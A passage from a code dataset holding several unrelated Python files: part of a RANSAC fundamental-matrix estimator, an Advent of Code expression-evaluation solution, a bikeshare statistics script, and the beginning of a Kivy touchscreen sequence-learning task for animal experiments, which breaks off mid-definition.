np.arange(0,matches_combined.shape[0])\n matches_sampled_ind = np.random.choice(matches_indices, sample_size, replace=False)\n matches_indices_left = np.delete(matches_indices, matches_sampled_ind)\n # matches_sampled = matches_combined[np.random.choice(matches_combined.shape[0], sample_size, replace=False), :]\n matches_sampled = matches_combined[matches_sampled_ind, :]\n matches_left = matches_combined[matches_indices_left, :]\n matches_sampled_a = matches_sampled[:,0:2]\n matches_sampled_b = matches_sampled[:,2:4]\n\n matches_left_a = matches_left[:,0:2]\n matches_left_b = matches_left[:,2:4]\n\n F = estimate_fundamental_matrix(matches_sampled_a, matches_sampled_b)\n F_list[:,:,i] = F.copy()\n\n # TO FIND INLIERS RUN ON ALL OTHER POINTS AND CHECK IF WITHIN THRESHOLD\n # matches_test = matches_combined.copy()\n # matches_test_a = matches_test[:,2:4]\n # matches_test_b = matches_test[:,0:2]\n\n inliers = []\n residuals = []\n for j in range(0, matches_left_a.shape[0]):\n r = np.append(matches_left_a[j, :], 1)\n l = np.append(matches_left_b[j, :], 1)\n # error = np.transpose(l) @ F @ r\n # use equation 13 from \"Deep Fundamental Matrix Estimation\"\n residual = np.abs(np.transpose(l) @ F @ r) * \\\n 
(1/np.linalg.norm(F.transpose() @ l, 2) + 1/np.linalg.norm(F @ r, 2))\n if residual < threshold:\n inliers.append(j)\n residuals.append(residual)\n\n # # MOST INLIERS!\n # if np.size(inliers) > most_inliers:\n # # best_inliers = inliers.copy()\n # inliers_a = matches_left_a[inliers, :]\n # inliers_b = matches_left_b[inliers, :]\n # # best_inliers = np.array([[inliers_a], [inliers_b]])\n # best_F = F.copy()\n # most_inliers = np.size(inliers)\n\n # MIN LOSS FUNCTIONS\n if np.size(inliers) < 1:\n continue\n loss = np.sum(residuals) / np.size(inliers)\n if loss < max_loss:\n inliers_a = matches_left_a[inliers, :]\n inliers_b = matches_left_b[inliers, :]\n best_F = F.copy()\n max_loss = loss\n\n # raise NotImplementedError('`ransac_fundamental_matrix` function in ' +\n # '`ransac.py` needs to be implemented')\n\n ###########################################################################\n # END OF YOUR CODE #\n ###########################################################################\n\n return best_F, inliers_a, inliers_b\n","sub_path":"proj3/proj3_code/part3_ransac.py","file_name":"part3_ransac.py","file_ext":"py","file_size_in_byte":6860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"453086706","text":"from solutions.common.file_reader import FileReader\nfrom solutions.day18.math_expression_parser import MathExpressionParser\n\nif __name__ == '__main__':\n puzzle_input = FileReader.to_line_list(\"input.txt\")\n operators_by_priority = {1: ['+', '*']}\n expression_parser = MathExpressionParser(operators_by_priority)\n parsed_expressions = list(map(lambda line: expression_parser.parse(line), puzzle_input))\n evaluated_expressions = list(map(lambda expression: expression.evaluate(), parsed_expressions))\n print(\"[PART 1] Sum of expressions evaluation results: {}\".format(sum(evaluated_expressions)))\n","sub_path":"solutions/day18/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577418536","text":"import time\nimport pandas as pd\nimport numpy as np\nimport csv\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\nCITIES = ['chicago', 'new york city', 'washington']\n\nMONTHS = ['january', 'february', 'march', 'april', 'may', 'june']\n\nDAYS = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday']\n\ndef get_user_input(message, user_list):\n \"\"\"\n An utility function to obtain user specific input value\n Args:\n (str) message - an information message for a particular request\n Returns:\n (str) user_data - requested data from user\n \"\"\"\n\n while True:\n user_data = input(message).lower()\n if user_data in user_list:\n break\n if user_data == 'all':\n break\n \n return user_data\n\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n city = input('Which city do you want to explore? Chicago, New York City or Washington? 
\\n> ').lower()\n if city in CITIES:\n break\n\n # get user input for month (all, january, february, ... , june)\n month = get_user_input('Okay, Which month? Or \\'all\\'? \\n> ', MONTHS)\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n day = get_user_input('Annnnnd which day in week? \\n> ', DAYS)\n\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n\n df = pd.read_csv(CITY_DATA[city])\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n df['hour'] = df['Start Time'].dt.hour\n if month != 'all':\n month = MONTHS.index(month) + 1\n df = df[ df['month'] == month ]\n if day != 'all':\n df = df[ df['day_of_week'] == day.title()]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n most_common_month = df['month'].value_counts().idxmax()\n print(\"The most common month is :\", most_common_month)\n print()\n most_common_day_of_week = df['day_of_week'].value_counts().idxmax()\n print(\"The most common day of week is :\", most_common_day_of_week)\n print()\n most_common_start_hour = df['hour'].value_counts().idxmax()\n print(\"The most common start hour is :\", most_common_start_hour)\n print()\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n most_common_start_station = df['Start Station'].value_counts().idxmax()\n print(\"The most commonly used start station:\", most_common_start_station)\n print()\n most_common_end_station = df['End Station'].value_counts().idxmax()\n print(\"The most commonly used end station:\", most_common_end_station)\n print()\n most_frequent_start_end = df.groupby(['Start Station', 'End Station'])['Start Time'].count().sort_values(ascending=False).index[0]\n print(\"The most frequent combination of start station and end station trip: {}, {}\".format(most_frequent_start_end[0], most_frequent_start_end[1]))\n print()\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n total_travel = df['Trip Duration'].sum()\n print(\"Total travel time :\", total_travel)\n print()\n mean_travel = df['Trip Duration'].mean()\n print(\"Mean travel time :\", mean_travel)\n print()\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n print(\"Counts of user types:\\n\")\n user_counts = df['User Type'].value_counts()\n for index, user_count in 
enumerate(user_counts):\n print(\" {}: {}\".format(user_counts.index[index], user_count))\n print()\n\n if 'Gender' in df.columns:\n print(\"Counts of gender:\\n\")\n gender_counts = df['Gender'].value_counts()\n for index,gender_count in enumerate(gender_counts):\n print(\" {}: {}\".format(gender_counts.index[index], gender_count))\n print()\n\n if 'Birth Year' in df.columns:\n birth_year = df['Birth Year']\n earliest_year = birth_year.min()\n print(\"The earliest birth year:\", earliest_year)\n most_common_year = birth_year.value_counts().idxmax()\n print(\"The most common birth year:\", most_common_year)\n most_recent = birth_year.max()\n print(\"The most recent birth year:\", most_recent)\n print()\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef display_data(city):\n \"\"\"\n Another change.\n Displays five lines of raw data if the user specifies that they would like to.\n After displaying five lines, ask the user if they would like to see five more,\n continuing asking until they say stop.\n This is the additional change.\n \"\"\"\n\n with open(CITY_DATA[city]) as f:\n reader = csv.reader(f)\n rows = [r for r in reader]\n index = 1\n while True:\n will_see = input('\\nWould you like to see some raw data? Enter yes or no.\\n').lower()\n if will_see != 'yes':\n break\n for _ in range(5):\n print(rows[index])\n index += 1\n\n print('-'*40)\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n display_data(city)\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":7121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"285233729","text":"from kivy.app import App\r\nfrom kivy.core.window import Window\r\nfrom kivy.core.audio import SoundLoader\r\nfrom kivy.core.text import Label as CoreLabel\r\nfrom kivy.uix.widget import Widget\r\nfrom kivy.properties import NumericProperty, ReferenceListProperty, ObjectProperty, ListProperty, StringProperty\r\nfrom kivy.uix.screenmanager import ScreenManager, Screen\r\nfrom kivy.vector import Vector\r\nfrom kivy.clock import Clock\r\nfrom random import randint\r\nfrom kivy.config import Config\r\nfrom sys import platform\r\nimport serial, time, pickle, datetime #, winsound\r\nfrom numpy import binary_repr\r\nimport struct\r\nimport time\r\nimport numpy as np\r\nimport tables\r\n\r\n\r\nConfig.set('kivy', 'exit_on_escape', 1)\r\nConfig.set('graphics', 'resizable', False)\r\nif platform == 'darwin':\r\n fixed_window_size = (1800, 1000)\r\nelif platform == 'win32':\r\n fixed_window_size = (1800, 1000)\r\npix_per_cm = 85.\r\nConfig.set('graphics', 'width', str(fixed_window_size[0]))\r\nConfig.set('graphics', 'height', str(fixed_window_size[1]))\r\n\r\nclass Data(tables.IsDescription):\r\n state = tables.StringCol(24) # 24-character String\r\n cursor = tables.Float32Col(shape=(10, 2))\r\n cursor_ids = tables.Float32Col(shape = (10, ))\r\n set_ix = tables.Float32Col(shape=(1, ))\r\n cap_touch = tables.Float32Col()\r\n time = tables.Float32Col()\r\n\r\nclass SequenceGame(Widget):\r\n target1 = ObjectProperty(None)\r\n target2 = ObjectProperty(None)\r\n button1_in = ObjectProperty(None)\r\n button1_out = ObjectProperty(None)\r\n button2_in = 
ObjectProperty(None)\r\n button2_out = ObjectProperty(None)\r\n button3_in = ObjectProperty(None)\r\n button3_out = ObjectProperty(None)\r\n button4_in = ObjectProperty(None)\r\n button4_out = ObjectProperty(None)\r\n button5_in = ObjectProperty(None)\r\n button5_out = ObjectProperty(None)\r\n button6_in = ObjectProperty(None)\r\n button6_out = ObjectProperty(None)\r\n button7_in = ObjectProperty(None)\r\n button7_out = ObjectProperty(None)\r\n button8_in = ObjectProperty(None)\r\n button8_out = ObjectProperty(None)\r\n button9_in = ObjectProperty(None)\r\n button9_out = ObjectProperty(None)\r\n button10_in = ObjectProperty(None)\r\n button10_out = ObjectProperty(None)\r\n button11_in = ObjectProperty(None)\r\n button11_out = ObjectProperty(None)\r\n button12_in = ObjectProperty(None)\r\n button12_out = ObjectProperty(None)\r\n button13_in = ObjectProperty(None)\r\n button13_out = ObjectProperty(None)\r\n button14_in = ObjectProperty(None)\r\n button14_out = ObjectProperty(None)\r\n button15_in = ObjectProperty(None)\r\n button15_out = ObjectProperty(None)\r\n button16_in = ObjectProperty(None)\r\n button16_out = ObjectProperty(None)\r\n \r\n # Time to wait after starting the video before getting to the first set display\r\n pre_start_vid_ts = 0.1\r\n \r\n # Sets per hyperset\r\n nsets_per_hyperset = 5\r\n \r\n # Inter Set Interval\r\n ISetI_mean = .5\r\n ISetI_std = .1\r\n \r\n # Inter HyperSet Interval\r\n IHSI_mean = 1.\r\n IHSI_std = .2\r\n \r\n # Target Radius \r\n target_rad = 1.5 # cm\r\n \r\n # Exit Button Settings \r\n # exit_pos1 = np.array([9*fixed_window_size[0]/(10*pix_per_cm), 9*fixed_window_size[1]/(10*pix_per_cm)]) # cm\r\n # exit_pos2 = np.array([9*fixed_window_size[0]/(10*pix_per_cm), 1*fixed_window_size[1]/(10*pix_per_cm)]) # cm\r\n exit_pos1 = np.array([18, 2])\r\n exit_pos2 = np.array([18, 10])\r\n exit_rad = 1. # cm\r\n exit_hold = 2 # seconds\r\n \r\n # Indicator Light Settings\r\n indicator_pos = np.array([8, 5]) # cm\r\n \r\n # Home Hold Times\r\n ch_timeout = 10. # ch timeout\r\n cht = .001 # how long to hold in the center until reward?\r\n \r\n # Target Hold Times\r\n set_timeout_time = 5. 
# how long does the target stay on the screen until it disappears and move to next trial?\r\n tht = .001 # how long to hold in target until reward?\r\n \r\n # Initialize variables for tracking cursor position \r\n cursor = {}\r\n cursor_start = {}\r\n cursor_ids = []\r\n \r\n # Initialize Touch and Prev Touch Boolean\r\n anytouch_prev = False\r\n touch = False\r\n \r\n # Error Timeout Times\r\n touch_error_timeout = 0.\r\n timeout_error_timeout = 0.\r\n hold_error_timeout = 0.\r\n drag_error_timeout = 0.\r\n \r\n # T/F Done with Initialization\r\n done_init = False\r\n \r\n # Initialize array of previous exit times?\r\n prev_exit_ts = np.array([0,0])\r\n\r\n # Number of trials: \r\n trial_counter = NumericProperty(0)\r\n #indicator_txt = StringProperty('o')\r\n #indicator_txt_color = ListProperty([.5, .5, .5, 1.])\r\n \r\n # Percent of hyperset complete\r\n percent_done = NumericProperty(0)\r\n\r\n t0 = time.time()\r\n\r\n cht_text = StringProperty('')\r\n tht_text = StringProperty('')\r\n targ_size_text = StringProperty('')\r\n big_rew_text = StringProperty('')\r\n cht_param = StringProperty('')\r\n tht_param = StringProperty('')\r\n targ_size_param = StringProperty('')\r\n big_rew_time_param = StringProperty('')\r\n \r\n \r\n # Define what to do when there is a touch on the screen\r\n def on_touch_down(self, touch):\r\n #handle many touchs:\r\n ud = touch.ud\r\n\r\n # Add new touch to ids: \r\n self.cursor_ids.append(touch.uid)\r\n\r\n # Add cursor\r\n curs = pix2cm(np.array([touch.x, touch.y]))\r\n self.cursor[touch.uid] = curs.copy()\r\n self.cursor_start[touch.uid] = curs.copy()\r\n\r\n # set self.touch to True\r\n self.touch = True\r\n \r\n \r\n def on_touch_move(self, touch):\r\n self.cursor[touch.uid] = pix2cm(np.array([touch.x, touch.y]))\r\n self.touch = True\r\n \r\n def on_touch_up(self, touch):\r\n self.touch = False\r\n try:\r\n self.cursor_ids.remove(touch.uid)\r\n _ = self.cursor.pop(touch.uid)\r\n except:\r\n print('removing touch from pre-game screen')\r\n \r\n \r\n # Get the initial parameters\r\n def init(self, animal_names_dict=None, rew_tone_every=None, rew_in=None, task_in=None,\r\n set_id_selected = None, test=None, hold=None, error_types_selected=None, nontarg_tol=None,\r\n autoquit=None, rew_var=None, set_timeout = None, error_timeout_time=None, ):\r\n \r\n # Initialize a count of the number of rewards\r\n # NOTE: this is necessary for scheduling rewards if you are not rewarding\r\n # 100% of the time, but the option to reward <100% of the time is NOT supported yet\r\n self.rew_cnt = 0\r\n self.set_rew_cnt = 0\r\n\r\n # Do you want to use an exxternal capacitive touch sensor?\r\n self.use_cap_sensor = False\r\n\r\n if self.use_cap_sensor:\r\n self.serial_port_cap = serial.Serial(port='COM5')\r\n \r\n self.rhtouch_sensor = 0.\r\n \r\n # Initiralize the 16 target positions\r\n # self.possible_target_pos_x = np.array([self.center_x-0.375*self.width, self.center_x-0.125*self.width, self.center_x+0.125*self.width, self.center_x+0.375*self.width, \r\n # self.center_x-0.375*self.width, self.center_x-0.125*self.width, self.center_x+0.125*self.width, self.center_x+0.375*self.width, \r\n # self.center_x-0.375*self.width, self.center_x-0.125*self.width, self.center_x+0.125*self.width, self.center_x+0.375*self.width, \r\n # self.center_x-0.375*self.width, self.center_x-0.125*self.width, self.center_x+0.125*self.width, self.center_x+0.375*self.width])\r\n # self.possible_target_pos_y = np.array([self.center_y+0.375*self.height, self.center_y+0.375*self.height, 
self.center_y+0.375*self.height, self.center_y+0.375*self.height, \r\n # self.center_y+0.125*self.height, self.center_y+0.125*self.height, self.center_y+0.125*self.height, self.center_y+0.125*self.height, \r\n # self.center_y-0.125*self.height, self.center_y-0.125*self.height, self.center_y-0.125*self.height, self.center_y-0.125*self.height, \r\n # self.center_y-0.375*self.height, self.center_y-0.375*self.height, self.center_y-0.375*self.height, self.center_y-0.375*self.height])\r\n \r\n \r\n self.possible_target_pos_x = np.array([6.75, 9, 11.25, 13.5, 6.75, 9, 11.25, 13.5, 6.75, 9, 11.25, 13.5, 6.75, 9, 11.25, 13.5]) # determined through trial and error\r\n self.possible_target_pos_y = np.array([2.25, 2.25, 2.25, 2.25, 4.5, 4.5, 4.5, 4.5, 6.75, 6.75, 6.75, 6.75, 9, 9, 9, 9])\r\n \r\n # self.possible_target_pos_x = np.array([fixed_window_size[0]/(5*pix_per_cm), 2*fixed_window_size[0]/(5*pix_per_cm), 3*fixed_window_size[0]/(5*pix_per_cm), 4*fixed_window_size[0]/(5*pix_per_cm), \r\n # fixed_window_size[0]/(5*pix_per_cm), 2*fixed_window_size[0]/(5*pix_per_cm), 3*fixed_window_size[0]/(5*pix_per_cm), 4*fixed_window_size[0]/(5*pix_per_cm), \r\n # fixed_window_size[0]/(5*pix_per_cm), 2*fixed_window_size[0]/(5*pix_per_cm), 3*fixed_window_size[0]/(5*pix_per_cm), 4*fixed_window_size[0]/(5*pix_per_cm), \r\n # fixed_window_size[0]/(5*pix_per_cm), 2*fixed_window_size[0]/(5*pix_per_cm), 3*fixed_window_size[0]/(5*pix_per_cm), 4*fixed_window_size[0]/(5*pix_per_cm)])\r\n # self.possible_target_pos_y = np.array([fixed_window_size[1]/(5*pix_per_cm), fixed_window_size[1]/(5*pix_per_cm), fixed_window_size[1]/(5*pix_per_cm), fixed_window_size[1]/(5*pix_per_cm), \r\n # 2*fixed_window_size[1]/(5*pix_per_cm), 2*fixed_window_size[1]/(5*pix_per_cm), 2*fixed_window_size[1]/(5*pix_per_cm), 2*fixed_window_size[1]/(5*pix_per_cm), \r\n # 3*fixed_window_size[1]/(5*pix_per_cm), 3*fixed_window_size[1]/(5*pix_per_cm), 3*fixed_window_size[1]/(5*pix_per_cm), 3*fixed_window_size[1]/(5*pix_per_cm), \r\n # 4*fixed_window_size[1]/(5*pix_per_cm), 4*fixed_window_size[1]/(5*pix_per_cm), 4*fixed_window_size[1]/(5*pix_per_cm), 4*fixed_window_size[1]/(5*pix_per_cm)])\r\n \r\n \r\n # Which sets comprise the hyperset? \r\n self.sets_selected = []\r\n for i, val in enumerate(set_id_selected['set_sel']):\r\n if val:\r\n self.sets_selected.append(i)\r\n \r\n # Record the number of sets per hyperset\r\n self.nsets_per_hyperset = len(self.sets_selected)\r\n \r\n # How long does the set stay on the screen until it disappears and move to next trial? 
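(values are in seconds)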
\r\n set_timeout_opts = [15, 30, 45, 60]\r\n for i, val in enumerate(set_timeout['tt']):\r\n if val:\r\n self.set_timeout_time = set_timeout_opts[i]\r\n \r\n # Play reward tone for every correct press?\r\n if rew_tone_every['rew_tone_every'][0]:\r\n self.rew_tone_every = True\r\n else:\r\n self.rew_tone_every = False\r\n \r\n # How long to give rewards for touching any target?\r\n anytarg_rew_opts = [0., .1, .3, .5]\r\n for i, val in enumerate(rew_in['anytarg_rew']):\r\n if val:\r\n self.anytarg_rew = anytarg_rew_opts[i]\r\n self.reward_for_targtouch = [self.anytarg_rew > 0, self.anytarg_rew]\r\n \r\n # How long to give rewards for a complete set?\r\n set_rew_opts = [0., .1, .3, .5]\r\n for i, val in enumerate(rew_in['set_rew']):\r\n if val:\r\n self.set_rew = set_rew_opts[i]\r\n self.reward_for_set = [self.set_rew > 0, self.set_rew]\r\n \r\n # How long to give rewards for a complete hyperset?\r\n hs_rew_opts = [.3, .5, .7]\r\n for i, val in enumerate(rew_in['hs_rew']):\r\n if val:\r\n self.hs_rew = hs_rew_opts[i]\r\n \r\n # What counts as an error?\r\n # self.nontarg_is_error = error_types_selected['error_type'][0]\r\n self.t2p_first_is_error = error_types_selected['error_type'][0]\r\n \r\n # How far away from a target do we tolerate touches?\r\n nontarg_tol_opts = [100, 3.0, 2.5, 2.0, 1.5, 1.0] # convert the percentage options to proportion of radius\r\n for i, val in enumerate(nontarg_tol['nontarg_touch_tolerance']):\r\n if val:\r\n self.nontarget_error_tolerance = nontarg_tol_opts[i]\r\n \r\n # How long is the error timmeout?\r\n error_timeout_opts = [0.5, 1.0, 1.5, 2.0]\r\n for i, val in enumerate(error_timeout_time['error_to_time']):\r\n if val:\r\n self.error_timeout_time = error_timeout_opts[i]\r\n \r\n # Is this a test session?\r\n self.testing = True\r\n \r\n # How big are the targets?\r\n target_rad_opts = [.5, .75, .82, .91, 1.0, 1.125]\r\n for i, val in enumerate(task_in['targ_rad']):\r\n if val:\r\n self.target_rad = target_rad_opts[i]\r\n \r\n # What is the animal's name?\r\n for i, (nm, val) in enumerate(animal_names_dict.items()):\r\n if val:\r\n animal_name = nm\r\n \r\n # How long to hold the home and target buttons?\r\n holdz = [0.0, 0.1, .375, .5, .575, .6, '.4-.6']\r\n \r\n self.cht_type = None\r\n self.tht_type = None\r\n\r\n for i, val in enumerate(hold['hold']):\r\n if val:\r\n if type(holdz[i]) is str:\r\n mx, mn = holdz[i].split('-')\r\n self.tht_type = holdz[i]\r\n self.tht = (float(mn)+float(mx))*.5\r\n else:\r\n self.tht = holdz[i]\r\n\r\n for i, val in enumerate(hold['chold']):\r\n if val:\r\n if type(holdz[i]) is str:\r\n mx, mn = holdz[i].split('-')\r\n self.cht_type = holdz[i]\r\n self.cht = (float(mn)+float(mx))*.5\r\n else:\r\n self.cht = holdz[i]\r\n try:\r\n pygame.mixer.init() \r\n except:\r\n pass\r\n\r\n # How long is the delay from achieve to receive reward\r\n self.reward_delay_time = 0.0\r\n \r\n # What is the reward variance?\r\n reward_var_opt = [1.0, .5, .33]\r\n for i, val in enumerate(rew_var['rew_var']):\r\n if val:\r\n self.percent_of_trials_rewarded = reward_var_opt[i]\r\n if self.percent_of_trials_rewarded == 0.33:\r\n self.percent_of_trials_doubled = 0.1\r\n else:\r\n self.percent_of_trials_doubled = 0.0\r\n \r\n # Generate the rewards\r\n self.reward_generator = self.gen_rewards(self.percent_of_trials_rewarded, self.percent_of_trials_doubled,\r\n self.reward_for_targtouch)\r\n \r\n # Auto-quit after how many trials?\r\n autoquit_trls = [10, 25, 50, 100, 10**10]\r\n for i, val in enumerate(autoquit['autoquit']):\r\n if val: \r\n 
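# the 10**10 option effectively means never auto-quit\r\n                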
self.max_trials = autoquit_trls[i]\r\n \r\n # Is it okay to drag fingers into target?\r\n # drag_ok = [True, False]\r\n # for i, val in enumerate(drag['drag']):\r\n # if val:\r\n # self.drag_ok = drag_ok[i]\r\n self.drag_ok = False;\r\n \r\n # Preload sounds: \r\n self.reward1 = SoundLoader.load('reward1.wav')\r\n self.reward2 = SoundLoader.load('reward2.wav')\r\n \r\n # Initialize what state we are in\r\n self.state = 'IHSI'\r\n self.state_start = time.time()\r\n self.IHSI = self.IHSI_std + self.IHSI_mean\r\n \r\n # Initialize the set number\r\n self.set_ix = 1\r\n \r\n # Initialize targets\r\n self.target1.set_size(2*self.target_rad)\r\n self.target1.move(np.array([0., 0.]))\r\n self.target2.set_size(2*self.target_rad)\r\n self.target2.move(np.array([0., 0.]))\r\n \r\n # Initialize buttons\r\n self.button1_out.set_size(2*self.target_rad)\r\n self.button1_out.move(np.array([0., 0.]))\r\n self.button1_in.set_size(2*self.target_rad-0.1)\r\n self.button1_in.move(np.array([0., 0.]))\r\n self.button2_out.set_size(2*self.target_rad)\r\n self.button2_out.move(np.array([0., 0.]))\r\n self.button2_in.set_size(2*self.target_rad-0.1)\r\n self.button2_in.move(np.array([0., 0.]))\r\n self.button3_out.set_size(2*self.target_rad)\r\n self.button3_out.move(np.array([0., 0.]))\r\n self.button3_in.set_size(2*self.target_rad-0.1)\r\n self.button3_in.move(np.array([0., 0.]))\r\n self.button4_out.set_size(2*self.target_rad)\r\n self.button4_out.move(np.array([0., 0.]))\r\n self.button4_in.set_size(2*self.target_rad-0.1)\r\n self.button4_in.move(np.array([0., 0.]))\r\n self.button5_out.set_size(2*self.target_rad)\r\n self.button5_out.move(np.array([0., 0.]))\r\n self.button5_in.set_size(2*self.target_rad-0.1)\r\n self.button5_in.move(np.array([0., 0.]))\r\n self.button6_out.set_size(2*self.target_rad)\r\n self.button6_out.move(np.array([0., 0.]))\r\n self.button6_in.set_size(2*self.target_rad-0.1)\r\n self.button6_in.move(np.array([0., 0.]))\r\n self.button7_out.set_size(2*self.target_rad)\r\n self.button7_out.move(np.array([0., 0.]))\r\n self.button7_in.set_size(2*self.target_rad-0.1)\r\n self.button7_in.move(np.array([0., 0.]))\r\n self.button8_out.set_size(2*self.target_rad)\r\n self.button8_out.move(np.array([0., 0.]))\r\n self.button8_in.set_size(2*self.target_rad-0.1)\r\n self.button8_in.move(np.array([0., 0.]))\r\n self.button9_out.set_size(2*self.target_rad)\r\n self.button9_out.move(np.array([0., 0.]))\r\n self.button9_in.set_size(2*self.target_rad-0.1)\r\n self.button9_in.move(np.array([0., 0.]))\r\n self.button10_out.set_size(2*self.target_rad)\r\n self.button10_out.move(np.array([0., 0.]))\r\n self.button10_in.set_size(2*self.target_rad-0.1)\r\n self.button10_in.move(np.array([0., 0.]))\r\n self.button11_out.set_size(2*self.target_rad)\r\n self.button11_out.move(np.array([0., 0.]))\r\n self.button11_in.set_size(2*self.target_rad-0.1)\r\n self.button11_in.move(np.array([0., 0.]))\r\n self.button12_out.set_size(2*self.target_rad)\r\n self.button12_out.move(np.array([0., 0.]))\r\n self.button12_in.set_size(2*self.target_rad-0.1)\r\n self.button12_in.move(np.array([0., 0.]))\r\n self.button13_out.set_size(2*self.target_rad)\r\n self.button13_out.move(np.array([0., 0.]))\r\n self.button13_in.set_size(2*self.target_rad-0.1)\r\n self.button13_in.move(np.array([0., 0.]))\r\n self.button14_out.set_size(2*self.target_rad)\r\n self.button14_out.move(np.array([0., 0.]))\r\n self.button14_in.set_size(2*self.target_rad-0.1)\r\n self.button14_in.move(np.array([0., 0.]))\r\n 
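# buttons 1-16 are configured identically; a loop over\r\n        # getattr(self, 'button%d_out' % i) would remove this repetition\r\n        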
self.button15_out.set_size(2*self.target_rad)\r\n self.button15_out.move(np.array([0., 0.]))\r\n self.button15_in.set_size(2*self.target_rad-0.1)\r\n self.button15_in.move(np.array([0., 0.]))\r\n self.button16_out.set_size(2*self.target_rad)\r\n self.button16_out.move(np.array([0., 0.]))\r\n self.button16_in.set_size(2*self.target_rad-0.1)\r\n self.button16_in.move(np.array([0., 0.]))\r\n \r\n \r\n # Initialize the exit buttons\r\n self.exit_target1.set_size(2*self.exit_rad)\r\n self.exit_target1.move(self.exit_pos1)\r\n self.exit_target1.color = (.15, .15, .15, 1)\r\n self.exit_target2.set_size(2*self.exit_rad)\r\n self.exit_target2.move(self.exit_pos2)\r\n self.exit_target2.color = (.15, .15, .15, 1)\r\n \r\n # # Initialize PD Indicator\r\n # self.indicator_targ.set_size(self.exit_rad)\r\n # self.indicator_targ.move(self.indicator_pos)\r\n # self.indicator_targ.color = (0., 0., 0., 1.)\r\n \r\n # Determine the hypersets (every 2 numbers comprises a set)\r\n self.target_list = np.array([[1, 12, 4, 15, 14, 3, 4, 11, 7, 0], [5, 6, 7, 8, 9, 10, 11, 12, 13, 14]])\r\n \r\n # Initialize the Target and Home position\r\n self.target_HS_index = 0\r\n self.target_index = np.array([2*(self.set_ix-1), 2*(self.set_ix-1)+1])\r\n self.repeat = False\r\n self.home_position = np.array([0., 0.])\r\n self.target1_position = np.array([self.possible_target_pos_x[self.target_list[self.target_HS_index, self.target_index[0]]], self.possible_target_pos_y[self.target_list[self.target_HS_index, self.target_index[0]]]])\r\n self.target2_position = np.array([self.possible_target_pos_x[self.target_list[self.target_HS_index, self.target_index[1]]], self.possible_target_pos_y[self.target_list[self.target_HS_index, self.target_index[1]]]])\r\n \r\n # Initialize FSM Dictionary\r\n self.FSM = dict()\r\n \r\n # Determine the relative task update functions for each task state\r\n self.FSM['IHSI'] = dict(end_IHSI='vid_trig', stop=None)\r\n self.FSM['vid_trig'] = dict(rhtouch='set', stop=None)\r\n \r\n self.FSM['set'] = dict(touch_target1 = 'targ1_hold', touch_target2 = 'targ2_hold', touch_nontarg = 'set_error', set_timeout='timeout_error', stop=None,\r\n non_rhtouch='RH_touch')#,touch_not_target='touch_error')\r\n \r\n self.FSM['targ1_hold'] = dict(finish_targ_hold='targ1_pressed', early_leave_target1_hold = 'hold_error_nopress', \r\n targ1_drag_out = 'drag_error_nopress', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['targ2_hold'] = dict(finish_targ_hold='targ2_pressed', early_leave_target2_hold = 'hold_error_nopress',\r\n targ2_drag_out = 'drag_error_nopress', stop=None, non_rhtouch='RH_touch')\r\n \r\n self.FSM['targ1_pressed'] = dict(touch_target2 ='t1p_targ2_hold', touch_nontarg = 'set_error', set_timeout='timeout_error', stop=None,\r\n non_rhtouch='RH_touch')\r\n self.FSM['targ2_pressed'] = dict(t2p_first_error = 'set_error', touch_target1 ='t2p_targ1_hold', touch_nontarg = 'set_error', set_timeout='timeout_error', stop=None,\r\n non_rhtouch='RH_touch')\r\n \r\n self.FSM['t1p_targ2_hold'] = dict(finish_targ_hold='set_complete', early_leave_target2_hold = 'hold_error_t1p',\r\n targ2_drag_out = 'drag_error_t1p', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['t2p_targ1_hold'] = 